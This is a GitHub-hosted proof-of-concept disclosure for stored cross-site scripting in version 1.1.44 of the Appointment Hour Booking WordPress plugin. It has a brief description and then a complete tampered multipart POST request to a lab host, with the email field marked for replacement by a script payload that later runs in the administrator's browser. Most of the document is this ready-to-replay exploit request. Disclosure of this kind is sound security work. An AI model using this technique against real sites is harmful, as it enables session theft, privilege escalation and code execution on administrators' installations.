Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
75 lines (56 sloc) 2.8 KB
# Vendor Homepage: https://apphourbooking.dwbooster.com/
# Software Link: https://wordpress.org/plugins/appointment-hour-booking/
# Version: 1.1.44
In Appointment Hour Booking – WordPress Booking Plugin it is possible to tamper the HTTP POST request to bypass front-end data validation and send an XSS payload to be stored and executed in administrator's web interface.
It is performed if a public appointment booking form is present. An attacker may send a valid e-mail address in the "E-mail" field and intercept the request to replace and address with an XSS payload.
The payload is then executed in administrator's browser when he opens the booking entries page.
It allows an attacker to execute any JS payloads resulting in information disclosure, privilege escalation and modification of the source code to get RCE.
POST /cve/wordpress/ HTTP/1.1
Host: 192.168.0.191
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.191/cve/wordpress/
Content-Type: multipart/form-data; boundary=---------------------------29750584827203
Content-Length: 1451
DNT: 1
Connection: close
Cookie: PHPSESSID=6mefvemchb9mrm2g9dsjd1r3tn; rand_code_1=74617fe239a71a602469791bde16fe49
Upgrade-Insecure-Requests: 1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_pform_psequence"
_1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_pform_process"
1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_id"
1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_ref_page"
http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="form_structure_1"
-----------------------------29750584827203
Content-Disposition: form-data; name="refpage_1"
http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1"
2019-07-18 10:00/11:00 0 1
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_services"
0
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_capacity"
0
-----------------------------29750584827203
Content-Disposition: form-data; name="tcostfieldname1_1"
1.00
-----------------------------29750584827203
Content-Disposition: form-data; name="email_1"
aaa@a.test <== replace by <script>...</script> payload
-----------------------------29750584827203
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"
ldqli
-----------------------------29750584827203--
You can’t perform that action at this time.